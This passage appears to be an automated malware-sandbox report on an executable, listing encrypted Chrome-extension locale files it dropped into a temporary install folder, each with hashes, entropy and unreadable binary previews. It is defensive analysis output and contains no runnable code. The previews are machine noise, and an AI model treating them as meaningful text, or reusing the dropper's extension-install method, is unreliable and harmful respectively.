SSDEEP:	24:YJ8B+jIhYIn7bi8nXptKFXVelQQJLQ33Ob0YbD:YaUYYIn35O+pc3Ob0CD
MD5:	747739B42F75825B3EBA24ED354C08B7
SHA1:	47C5B20F222D0ADD840BC01FDA33205CF4833A8B
SHA-256:	8874E1FDEAED824513DAC92CDBA3C49DF39049AFEE301A76624B22AA67B31ADD
SHA-512:	D4B27597B997718E7AF5A80D37516D5C57B1263863E245C75AD71E084A80857223F1E5539920E6C001EFF7038DA3DA7D75BC3D3ACA4F69B986B33F84489BF522
Malicious:	false
Reputation:	unknown
Preview:	{"cra..G.....a...3.gn.Z.......&....e..5.._.$Z.z.h.$.)O...^9....(Q&1.F.u.7Ho...........1..2......+(A........jP~........k.ZN...."!.7L>.....yw^I'...k.PIS........A.F.0-FaF.....u..uB.^$+.L..."".F.P....`.x....Bm...&UV(O.......i.....z"<..b.......c./...H.....7.5I.>..L."&.....=.T....`.r.,....t.ci...ei&J5....r.p..r...g{..5.P^>%...J\|.On.z...}\|i.k.ie.R...X....n.A...A....v.E)...&.........L.V.Ua...._p..S/..2.f.'.....P.z5..".N..>.....yy..\|<.G.....u........\|.l..F.U..p..vG...s..(.;.^..sq.).:..]..@...6.'....q...3..g.}.1>.L q...as.........x.>I..../!..B.Y.[....q.v...6r..v.....n..6....E....52.w.Fs.4.../%..p.S.L..N....F.1.^+.NS_O...T....nK....`[.H....;...)..l...s.6.7&."pu.A...uLo.{.3.5.....6d. ..b5+O.....G.u.--..pR....R.".sQ.H.....R...Y?G%......].........E...w...R..]R..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	844
Entropy (8bit):	7.730388454760534
Encrypted:	false
SSDEEP:	24:YoDkGOvyz0siqb41y9bejHniBJFm9wZY3WArpbD:YqPCyz/qEkmBqt3WAFD
MD5:	5D7931F1B972F91A101B4416CF4194E3
SHA1:	A720BFF6B2BF44E5BCD78A1FFB9B446F6CB9B605
SHA-256:	CE502FD68C51EEFB1BEF1075B1AEF0877F3FE37A1D50F3AD008942D8C12207BD
SHA-512:	05A61393E85692CAEEF55D03436B376492D75FD450B642CFC8C5741F9ABED263DB67E4C2459C6F0190FD86C05D882FC8EC6D4E7AAF80E822C11A302DCFBEB9DC
Malicious:	false
Reputation:	unknown
Preview:	{"cra}.l>d.....1I...G..$_.....aW.0..[D.)Q.a..:CK..t.99..2).J.n..[..j....+../xg..%vA.q)R..X.T.OdcN.?fc....e.7.I.&.%.G6.\..s...'.....7...@z].HG'...aK".......Gc....Q..H.;,sV..w...~{}......2......+BG...\b^......\p...p^BV..1....]......cv.T..c2~.%.!G......{.......%.@....B.\......2..B..>p.#....N.8.GP........A..k..G..Q..-.6.#w..0&...G.N`4...\|. ....(}^...R......4..@..H.O!.../$.C\|B.e..1...<.......(.=...l...a.&...0.=.9}..x.......W.0.-.......Nje...?.....D....>K...J.b.)...."...".(.!.,...mQ...W..$.E..}.9Y.....z...F.d-H.h+8...>B}..Uv...:...`..gQJ...)..O......89.Hq...-..z.)....~....>...b....?..+ .....9BS(.2.n...&..R.._].........."..e.j..).p@..M.fM.u.+Y.`]...v......&.q..y..[u...k..Yt.D.x).Ot.s..w.!..;..\|#<.J7.....l...C..+l..`pe..u.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	794
Entropy (8bit):	7.713896499633201
Encrypted:	false
SSDEEP:	12:YGatEhrYuLPpe5v18t4srz4azCtuKpbzgITUfErXF9yAnO8tcii9a:YREhYuLPC1srz4azXKzQfEr7yAn/bD
MD5:	652E90A283CEA5EF37D5D70D0F7EC302
SHA1:	D90768C3DBDECE119B6B3A8B366F238827046069
SHA-256:	09551737A1D72950B733ABE90090D17196F25DBDFACFC06F786E1201539EED86
SHA-512:	0D1109D4BAD6AD8144F59B02633FD3DF3EDBC065184948441E5B24A8210C9E423E5551B2A7635FDBEBC83C536CFA66C856742254D17FFB4C5807E29BA71AEF5D
Malicious:	false
Reputation:	unknown
Preview:	{"cra...L.............g8.j........ic.2.y.....B.B.......{....6.o.....{...U...$...d.. @...........Fq..o...S,C.$A.='&&.lI.7.8.C.T\|"Tog.adi.?:L.....#.`O.4..@xcx.4M...,\|..."..5........i.'1......I.x.@..1.o.......4.5.E:S.VJ.......9]h.51....M...GQ\|Vz.k...-[$........\|.'..H....;d5.....>.x.......T.o8[:X..(.<H.....nX.s0.=<b.l.h......hG.."H2....AFw:).!.&{.;>.K...?"Y..I.<......0Y..c ...I.8..}..1<e.M...}^k...Y....<P......ao.;2....`..9sD..{]..at....\h.._..n.....d..N.L........[o.*~..S"p.b..3...>L...=@d...t xp..g.c..k.^...........,..@...A.[..LE.....).m$"{d..i.E.g..mr......`.........G-..61..@......... s.4.E...c..l.`...GFQ......[..\|...#ej(.N.3. ...#.z......j..Q%3a7q;#...c..H....T....P\|./s..W..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	902
Entropy (8bit):	7.70957630338968
Encrypted:	false
SSDEEP:	24:YHhL97tCAOGwexDBRF40yAJDt+n/0/2gn7MObD:YF97AuBnJpo/0+87MsD
MD5:	5C56F70524FC08A98C037515BDFF15B9
SHA1:	00B7A92663BA052D88BC8F0CEFED771020944DE9
SHA-256:	462913BFC421835A376F99094B976BAA9ACCAD935F4A74DBAADFBA0719E00801
SHA-512:	F1ACC5B07D911413EBCDE0942DA32B5E92E8187AE9115AF9A2BEAAB2D2E399BAD58B65758EEA2A5520854284F65EDF62D37E6C30BBE0B0AC82EEE991B374D22A
Malicious:	false
Reputation:	unknown
Preview:	{"cra$/HvE.>7.("#..@.SB.\|.s..3>A.V....u.'..v`..S.........q8Hm..-.Gfb..{Q.b......$...?.k...}.....O1..7...z.9..i......t!.EU...C.~d.. B.$....B...E..M.H...uK..V..g.6F.......TI..S.=...........CU....Q..R;........+Q.l...{.D.H.>......p.I...J.....56p.K..hx9sU%.T.u....nyzt.........C.O...:..>..,,q.9P........t.O.....J..i+2".......e"Y.......c(..?X.,.M...:[.........}..../W..Z/.y,........`.B)...~.r?Z....E..q...}.PW..O^.2..\|..6...D...9.o.p.7..........A..a.Q......-.a..^tNgW...ko...<^/PhW..z(.1'9....Jo+..m/a.m&..27x....MTb...M.....kr.q.1r....V.....Nj..[.x...m37m.$X...~..4M+..Q.~_...896CM....K.G[.4.{...H...T.....Do...;+<#...^..........<;B`...0.Tz.........\|...Z.}.X......Ve.-...4zXBx..2/h.....C.+......pzeZ..f..f.g.s..^.pi...Q...o..5....#x.Vk.le.../F......NDp..5..1x......E.Lz7.L..R..<=Q...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	849
Entropy (8bit):	7.752129801815217
Encrypted:	false
SSDEEP:	12:YGLxhS5iMMvRxbw/YZlMsScc+Irnnhwkkj4YlMi11SaCy5Aq3a27jjz8heL0HmQe:Y4BMcRx3Zg7jDh3k8mMGYQh1OxGWwbD
MD5:	8DBD45DEA32C8F70EC3D0622B25EDDDF
SHA1:	0302CB569551410A2DEC4F22A59A5DBD4D35A767
SHA-256:	12EBBDA2A5B95CE06280D2DD06929192A6C18C8038EA1160CC3F9E797DD72F13
SHA-512:	AFB1CEADE104F8EC25D81DF5C6249B118F6C75BC0B8C2284CC4796C5A6B9140707FFDC8DC955824DC33E545712196DD05BF7A9968FC8146E01D66A4570ABDA5A
Malicious:	false
Reputation:	unknown
Preview:	{"cra.d........._.^.Z.....'.r..?...M._"..e..[ix....\|be.....v...`Ug.}AbN..`F..i...Ru..~......J...EE~....O.\...5..y....A.h... ....8.......o.$.....k..0...7.....d....W1.mx..-6.&.?.YZE..%.v..9ee....}..b:./..+,..K.8..>....y+...,...5..nc...U"..y=....\.(..G..7Sk.8.EY.....Z.b.G..[....h..l.I.../..H....=..l.6..vRG...Uk.v...@p.h.^S.L.[.....T.!.-...3......R...G.KZF...../.E~$.....y..<{....;..dc......!..B9.DCZ9..['9.......%v....8...%vC;....I4X..T....G....Q.....Jg.t.Z...7.2..`=..B.^S.g...!..y....Q.O......s.f....%.('..~.b.y......eA....".'.....d.%.^...#.M.s)Y'8`.!.1..M!.[=R...; .... .....nWz..\M.........'..]..*.wT..-.n...Y!QY.G .T.n.R_.7..'.f...p.[.6....\..c..._I...LF..O.}S@2...H......mAQ.......c.#q.............{..V.H...+I.?K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	896
Entropy (8bit):	7.746952642341753
Encrypted:	false
SSDEEP:	24:Y9MJFss/aGqcbtxzrJUO5llDYVluUcYEnNMbD:Yu3H/ECxJUO5g2UynMD
MD5:	EE783B5F32C0C31A89F2F13E829FE28F
SHA1:	481D36FE8258ECBDA6DD51DA026BF09182CB048F
SHA-256:	795C974078B725677D836255C0328D2BFCB46A3D1B3336209B030B74A8C2FCDC
SHA-512:	5C766BC538C49475A3EBDD6E4817A3C0FFF51F95BC4C29F662B08906869E7239C86056905063C1533BC1AE6E87616A2F9777FCE0B7E39E9C98C51432E30487CC
Malicious:	false
Reputation:	unknown
Preview:	{"cra)....7.Q_o.R....c.).M.d.o.pN..BRstS3...c.d....7O..+..X[.H...n....l..O6.5..p`S....._P.....P.5G.7.K.@:(.o...{.s..?9.K.....X.6q ....+.k.=P..T.T.../......\2....M...4?.....[">.U..1.'5a4.`.R..&i.o~....IP\6...W..\N2......H<......>Y....!.7..@h.Cn.dC..n.E.#.72.% .F.WfX8..m.....i.....7.e..78k......[-.....y.\|3.'}..u...d....!.jw....v....X........Y..T'......P..<.:.../.........5..3.......c:..>q...y..{8.vL2'.y...}X.X.\|l..w..~...........kk#..x..a@.....p...F..;...0/.YD".....bQB..z..]...E.\....h....h.)C.......rH.?...S=>...y.;..:.a^.B-.aF.>..F.>}.K...p...2,........l*.....9.#./...1#.c..7#4..}..c.6......{6..I<...&..x..r.?...f..n}}.D`...)..\.C.../,.\|Y;..O.@...W...\|...0.FDt..H.....Fiz...`..7Nf..D.f..d......E.9....6..~.....g..9...kB...J...#2.m..:)9.....\......J....%..+tK....e.-.......yK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	7.858176098378179
Encrypted:	false
SSDEEP:	24:Y7tjKatzRUoqL8yoakGwUKFN7Sc6yLeXuQ3YDArIElG/Qoat9RJ8Gc4gdbD:YNKalRUONawnEc3LmuJkrllG/o8GctdD
MD5:	4A32928B98685B6194D71F9ECA1DF538
SHA1:	AE65A9DF6951449AEB4D87C044387129EC025045
SHA-256:	DAED17097511993615D4E48A723245AC32904DD63E5F9D7F08F906CD60008AF1
SHA-512:	60B7D25B44499B5E4566CF6523F5CFCC7F645C182A2871C3E8FACCDFA88205A1B3BC9F0319C341BF58B95113FE72FFDC1EDB46902B14398603B415195675771D
Malicious:	false
Reputation:	unknown
Preview:	{"craokS.s...8.0...E.!.I.x:..P............Q....u..l.8z.9.......(.%I....P..G.".2.j.99T_AG.^%{..(...7....j:......../B...}...V.Ny7..MFN.....L.D.r..-...'..$..N.bY.WA.gA...1a..k2;..O....{-.L...wO.?A...IP\|T.Y.R.'.sF.~u.......+.h..?g."a..%B.6."....5....M...B....gV.h.O.Y...>./^......j.,..C.q...5...g.p..L...}8.......f.W.,R.H.4!.#........0.Pl.`.tP. \.X_..o.M.2.......Q..y0K.R......wnkB.u...;..`...T..b_.Yi2.(q.t....M...}j#..Y._A..i...%-.%...g.li.Ow.......=~I'..J.. .#.P...w/.?.....i[.y...H.p....!.Mgmm....6.d!.kF.&..s..!..E..B&"...u..w....{..\...rp0.!...D..Z....j.lQ!........6:..`......0o.].;.V,..vL..B..:<g..Wv..".7....g...)..+t..'..#).In.......i..=.O.`OR.W\|.V{.!9.X..i.6.rv.f0Z'.........;...zEn.......?GP.uK....Lfu.G.)F.I>...6.-..Y...4....HE.z#.5.].v..~....0..B.;.G..h%...W...t..(...%).n^...g....r.J_.Awu<`v..h3/....m.z.\.K....v. .......Fc...._mj9.v>..uh.l...sJ.y..C..*.0Z.../W..U.J..9h.us..\..X.d. .LDb..9....V...u...b....J.T.tN!.:.;h...^Zq...lRk.....R..M..@.

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	837
Entropy (8bit):	7.721541571934852
Encrypted:	false
SSDEEP:	24:YY4hPHZRbl0Szkoj56QpzxPo5AScI1TEWibD:YpRbl0SYk56Kz5+TUD
MD5:	3F393D2F18BB91154A5C7D2E473AB3D2
SHA1:	36941B0B39AB2EB0B46BC0C39540A86EFE522832
SHA-256:	FA88F240CCBF73D70AE5656B26914A95FDED1BF0B571A9D42B21F53B058DA5ED
SHA-512:	9B52D1825547BB65BBBF440AE30307426DE233524B2EEE7CF5540B43574782600A7BAE45F2BFF45357415BC8E958522A34174E2344BD9671022CABD9C6FD2E7D
Malicious:	false
Reputation:	unknown
Preview:	{"craw.o.W...m.A.MG....T.Y)..P..WS.2..o3.&z,.z..4T.....5.S..,M...`D/<P.R. ......~.......n.k......4x...1.4x...i....2.-..+\....$.?...$.....p..cM......K?3=N..;.4.....0...)2..N.4...dS.jD.Q1CD..X..*.8...%=A.Z./.o.......&.woj..-..{v..sI..a..t0.>.w1.r...b.q^......t.Mp.....i...1}Y.g.>Rd...5B8.}..1.....'..w...~t.>.......g.w......%y......)WC+....^.Q.)...%F!}..]...+c..O;.r....\|.v....@........O^..g....U.;......O..M..'..H.j./6..Y..Gx.@[o..q.......rFi..zf.k/.......-c.uV...6......8..C..P...j.......1....z.#.{E.[..6..1.@...;23..I..[..l........y....[...&./..7.y..6.@`.......t.\|f......%8..IC...i..X.g&.P..Nj..'.._lX..x..M i.......+......WH.c..p....j...G]/.......4T.......^}e..K.).{....($..?l....b..3...K......;<...mx.0.+...(...'...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	946
Entropy (8bit):	7.77375710274967
Encrypted:	false
SSDEEP:	24:YyrIu9oNzRTh6a8e7suQayadb0qyap1WgLeBDmS4XeSIsbD:YyFg9Th6DePdbj1pleJmWSImD
MD5:	F2BE480DFB733A63D6E5F2DF730A3E3E
SHA1:	4B609345A79EE75C6A1545E1B183BD208243F1CE
SHA-256:	EE17B0F2F7AED98F40BC7275889609012BBC1B1685EF073BA07F128745D8576C
SHA-512:	F874BADC8AF06F8415EC51F5DBFDFBD742DB22C72CCAD8F2F556B1B2A4DDA50EF876CA19E615B061D839C2C542FF0DF54D9E9DF1F771352FFD63975C2221B2CC
Malicious:	false
Reputation:	unknown
Preview:	{"cra.Wx).QF...y.........P...."...m.W}P...I..yT}@F.M....6..73....8T.......3(..N......c......m...}R..A./..3........~S&.....Y.]..5\..T...G.....i.M."..c.....f......4.r$..nq1q...'N.=.Q$.%n.zN....(....;......"~R.q4...G..)..L..J.5c.b\|....=...m.<.@.T.j..i..#..1B..2.1.......9...e.-.v.?g.h6f...yA...[.@8..p..Z...p.nRox....{.m...8...j....c...U,..R!....]..q....<..........O....nQ$.\|....'=...9h....<_..T.x..>Z>....w.....^.G.....=o.P....J....c..1,.L.8..>+...&Y6.8S...D.y_.Ie..`.I...r.[>W..vL...F.m.'.iIG...g.y....{%(.."..s.pX...!n!....c..3Ee>.y..=V.0F.2.H...[...S`/'KF...(.a_...$..E....?....$}=....0....>............0.u.D.p.!'.U.....~.J.....3-.\.-.}..by..f.`...Q....y5.j.Q...y<.....(..c....P.q....*....n...n...~.U1..s.Z......Q..........Q..#..irU......w~.....i+I....Kz.o..4...?x...c...........y..$.B~._..A7.3....A...Ru........K.P.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	795
Entropy (8bit):	7.750438270002503
Encrypted:	false
SSDEEP:	24:Y8DmW+eRpr+BZmy/SFNK6ZlAJmq/lHgruM2dx/bD:Y6mfQl+d9vJmq5g+dD
MD5:	009875F688D0FB3C75E750B5E15B7394
SHA1:	8F168ACE8C9B9966B9CC7F4572C3589BE767A0A3
SHA-256:	0D557D1674E5A6764992E10BEE75DFBBDB48E1796A0B581E287AD209800783B0
SHA-512:	B5743D7F924708CE116C589C2278282A6AB3B3479C018774D97156476B1A23BCD04E653DEC59C06C4ABB1C0A4B9FCFF64A7C134CDF7496BB0A72EC1A652688F6
Malicious:	false
Reputation:	unknown
Preview:	{"cra@......?S.04oN#.7.Q..].....S.q...D......!6.....M...0y....xi.#.....I..T.......HM...@..2.Nc..Un-.z......"I...g7.G6.4&...C..1.D.59....d.G..<...Ry...../...!.........S.j..@.\.I.z..O.E.A.;..0@..k.TI...,ZW.b..T.$Z.... ...M:xR.,..~.%.....5.c.`...{(8..A?{y.b.V.i.S.......W(...#.T.....\|.a.....s.).x..osO.g..N..H........;...Jz-............_..r...m..E..1.X..+..O..M.n...\]....pk.....<0.K.A....!..!y.ju4kG7.@..`.5..#Q.......LH!<lg...w.....}%........4fY.iuV.....a....Oa....o...R.KO2Sp..y.8q.e.z./..r....8.n.1/.a..C.h..p..J8SK.'M...e..I...U.....8z.@..8!....... -.z.Z...q....f.[~mAf.T7.N.j..=..<+M.^........)l(....2V....*.....!....P.g..#P......m...\|.-.....6..Pe.(Gaed..)....V...[.zK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	798
Entropy (8bit):	7.733871725614018
Encrypted:	false
SSDEEP:	24:Y/18Y6s2LeJb5mCfyl2w7A5FNbHrKQnSbD:YKfKtmAqbwjrID
MD5:	545431854807B263AD87C0A82A4BC327
SHA1:	DA150BBE62B981B873162ACE1079FFF787ADF39A
SHA-256:	12FA5E37AA141F8124F745582C683B5C82C76AD6E20DC27171C698208C3A218F
SHA-512:	E7402665013C5AB55D33400967E320444433C1CC3A6008296FDD0B450362015E0A79FC49EAA492F255F71941616F419DC8838A1A51F863B9B5D57ACE10AD09B7
Malicious:	false
Reputation:	unknown
Preview:	{"craL:.1:.P.;..O.q.pi....n.Oe]..............uJI...\8R.......?B._.Au.W....[Uj...].\|BynUiMX.....gM..._.....i.N.k....',<5.`..?...........U.KwH.........q.Yii..'...x.D\.."bk..~@=.......B...Mw.c.`...V.j...Lj:U.\++d...#Sa..Cav....F.&t.k..C..>...SD....%.aMY.?.2{.....d...E..&.H..r..s...TB.b".c.E........O4m.-......A..;/.:.C,.W.Wg.1F6..!.5_#...0.Q:...`.fy..Ku..v......L.aG'y.E.{...H@.k.2F..T..q...l.....:..v$l(..[e.QR....Th.....(Fm.1v:...g.$..Cu(z.p&.\.k...M.e...~."....W.........jU..A.[.kf..t...Y#.n4...5..eNjm...Z.P0..l..h./.G.....{l}...q........Y...Z........4...7...W..n...9aT\|.jjxyi.o..E.l..(........wn1.J.6.....B.w0...V.`zU..!......S/;h..X..;.,q^_c-=......W8-.._.wb..k.....VG.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1140
Entropy (8bit):	7.806841771654419
Encrypted:	false
SSDEEP:	24:YJ/3gIvYqUlGwvUWqQ31RK+HYEUOPIzCvbkoCTJQKdubD:YJ/QnqUowvhqQvNHRwzGko2QKKD
MD5:	98E86745154365296626DB0E8555E51D
SHA1:	51A7FD58AAA48383B3FF721C1F897D8B8698D727
SHA-256:	FA807D8696BD9A25735C9151A6CCCF4D836DAAC615195FB689EA9FED62B2FAD5
SHA-512:	47BCD425F6D6B32A0711573B84F96AC33F9A049337AA56BA9CA5F253C7EA2E1FF05AE2DC0E3D2576C4F4D36576D153F8D1DDD4BA56E8BAEE6F0BE2B38B13BE95
Malicious:	false
Reputation:	unknown
Preview:	{"cra.?$.A1..P\~.%.q.._..A..o...O7...)......S.0`........U.........d..`k9b&...\>....3Z.n.U..M....Z....D.G$...d.......5..u..,i..:~.?;.. .{....I.W.V.f......~6...._.}G^.f..<........x.8P...g.$.=.l......P....&.y.s=.`l.L.SP..N..VJM...^$.=&...%K.O..h..\|...9.....K...8.A.b.(...9#_..."...3j....YH.....eIS..!Og...c.Zw[.L{.2.,YN....^..nu..F..O.......s......fF...4...u..OKC....L..6W:x.F..jd....<#.H..%6. <.s.c..T.p.9.P.1..}:<...........a..-.;..D..H...!.,5q.......8.+...M.m!..3.TnK.{M.hu.N.el(.lg...sT.w..GX." }.'...xA.......~'..b..@...:....p.#G..K.(.5N....b...f.csl.U.......3.<A.\|].V.[.G>...c.r......:......aMy.x.W...s"..........._.j...4*H..#.\..q>.,....Ws.v.o~\U.R.u.~.A.6.)>.R..mDT........6.............~I^XE..^[w.1.b.c.,O"..Qn.. q...Nl8av.).+...nW....X.g...M..gN...T...Vav.Qp,.h..y..k.5.~4.j.R..N..<}S.:.6W...X..vp~X.Y}o1gtZ[....~.w..l8&MUP.+x..1....[..y..Vk.m1.v.6.'..j#.E...j...3.?....'Hj4$.5n..4..KZ..V.pW.v.mAvd.....)....bL.....c...{G.Rw...v/.L..

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	7.8026048632928875
Encrypted:	false
SSDEEP:	24:Y+Q34fKcB1FFtL+v4EFj365XPmn1ttu/0PLrmV8Ratu6Z6Fa2Lal7bD:Y33EKc3FLLHej34XPmnLtQk4UatuBFiJ
MD5:	B2AD10F283C7208C1098E676C9F69ADF
SHA1:	4C26CD66839CB0171F64C3BEA4956E19849AB481
SHA-256:	18AE54CD3E85EF9C97821B7B7C50A774BB2701BED849EFF2C8B2F5BF258E79F0
SHA-512:	75BB58376297F5B647890CB98028E935A1A6CD9577A0A0A6A226622263EAEBA2FD6795984589669715D2BA23BB6E570EA9321CFC3632A5A853B1522E460B5F39
Malicious:	false
Reputation:	unknown
Preview:	{"cra.nC#.l...L..}.Y.B`.e.'/.,7$7.....V..%D....1.....$v...c3$..%...a.Sn./..I..Y...x...~F_.....XJ{.-.d.]e...\......j....5.=^......v....>P.........3.Q....@...y..i...#..E>y.E.C`.[s....W..tq.~'...3W"b.M.J..d2........;..#h6:l.@.....$1.{jy.........].i.1......u[l8x......W.+._.......:.}..jH..v.......(}.."N..h.[..X3.......JfA..J ....A......g......lQ...\|57i.\|5y....WWv.........NT..<..U....`..jM...N..H.uN..r.....e...C....&]..D...L..q..O...1..7.5.j( .)r...U9.-.Ll.....b.....khc.q.._....hM...\im[..V.^...F..=+.{..,,...0...}...d..KM.H...j./....O...o....M.=.[.Y&W7......c..h......Tj."f.a=.q.=..:..."=..?.....J.O.t.TO......p.F.K&.d.-..n.....s........m...R5'........*..M..j"....,$5......s....Cc..e,........k. .X^..\..>.z(..1..G.M8.z.I.`u..a.c......<.7....2.%...Ju....l.M}P.j]w2\<k.&.F.(:.1l.bKJ`x8?..p.k.PG.!...6....];.S...&.\|.R...W.s...xT..K..VI.N.....n.1.(...N=TU.u.#...OK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	910
Entropy (8bit):	7.7719602846550915
Encrypted:	false
SSDEEP:	24:Yn2Wgsa7w1En7oP7bIbQE13X2SAM+l92eBuE/SXV7jiIzKcbD:Yn2g1EnQwcE9X2bB9SXV7jiIe2D
MD5:	E8729BD93105047FACFB88074DC28C15
SHA1:	451BABC82D0CD6893E7715A587472465F28B656A
SHA-256:	5DB10491210D19315FA12C07F9C1304232B44BE9584FAF80699786CC931449A2
SHA-512:	91B2B2573360D5E69AC9A1734E2E14C7B3BBDB89D56FC4B5537EC2B3989EC60BBADB9852966AB53568160ECFEE716379051C92BDB16F821FD3404BA937254355
Malicious:	false
Reputation:	unknown
Preview:	{"cra........v.2<..$...f.M.."'...r9.6./u....../..cf..................\.........<.......@.8.\1..T.....$......~.$.=......T.{.9a.7..W:..P...1..6O..4.....[..P#.=.....Ck..[.d.,O.?$...."U.#USv.I.'aU.7..>.q*.f^...Q.=c.Gq.....Z...z\|$+.....a..Tq.....7......_.2~8..c.O..`\|...T..i..WU.9..)..0).PJI...g.M0....).....2...y.<0.r..h{O.$. g.4.`..<.>.!>x.T..............9.t.z..H!.,....6.....3^..4c=A.(....}n-v.Z.....u9.....K....KD...s..x~..oP....~w@\.z.....a..V.....SM.xU}.=...:n....c.i...Qd.F..E..In.....P.....L...Y<P..`.T}{.1.Ni2.78.g.4).W.K.O.N.k..]EL....!I&.<>.M...5.UjM%.<....>t.t.L...R+A..Q.Y:.v..B...........H-=$w..O.r..l...OF9...Eb...L<.%4..H.g...R-U. ...../E.w&...;...9..."b...[?./.F..>.x.9V..H...be#....=...o.!6..n.....?......Mb..A.g..o.f..O...Bz......]L.0y7.8.0/.=P....g.."..M.........z. .K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	918
Entropy (8bit):	7.787763249073229
Encrypted:	false
SSDEEP:	24:YwaPvcbTE4oGEeYd4uiOiEKtTDUXKA4/kFPKO1A9u8TbD:Y7PE73Yd9idckkdKaaVHD
MD5:	00600BB8CD0E09CF2F9A115C77DB9EB8
SHA1:	9001FC57D286EECB14FF6A33664F6E8A23E7D7EA
SHA-256:	0378884BEE56CF2C53D6A5C9A497F7EF6DFE8A6FD8664AB444A38C7F593920F2
SHA-512:	157E778BF909449F6C54E377AF2FD3D5B5366476D9933DBCAA876BA52185022819CE605D840B5E307B279A0D2D1D64D00575543D23AC56D64B18F260A6BFEBE4
Malicious:	false
Reputation:	unknown
